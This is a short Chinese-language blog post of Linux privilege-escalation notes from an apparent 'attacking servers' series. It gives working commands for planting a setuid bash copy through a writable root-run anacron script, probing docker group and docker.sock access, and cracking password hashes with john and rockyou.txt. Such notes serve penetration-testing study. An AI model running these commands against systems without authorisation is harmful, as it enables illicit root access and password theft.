Maojui

攻擊伺服器 (五) | 提權 - Linux

2022-08-05

PEASS-ng/linPEAS at master · carlospolop/PEASS-ng

CheckList

Checklist - Linux Privilege Escalation

Anacron

If some jobs execute by root

  • Script is modifiable, then do below script and wait for bash create.

    1
    echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > target.sh

  • Execute by root

    1
    /tmp/bash -p

Docker

  • In docker group

    • Check docker.sock

      1
      2
      $ ls -al /var/run/docker.sock
      srw-rw---- 1 root docker 0 Apr 17 08:46 /var/run/docker.sock

    • Or try to find out it.

      1
      find / -name docker.sock 2>/dev/null

Password

  • Rockyou.txt
1
john --wordlist=rockyou.txt pass.txt

GCC

Find 

1
find / -name gcc -type f 2>/dev/null
Tags: 實用小 code 駭客 Linux 提權
攻擊伺服器 (五) | 提權相關 - Windows 攻擊伺服器 | 小技巧 - Proxy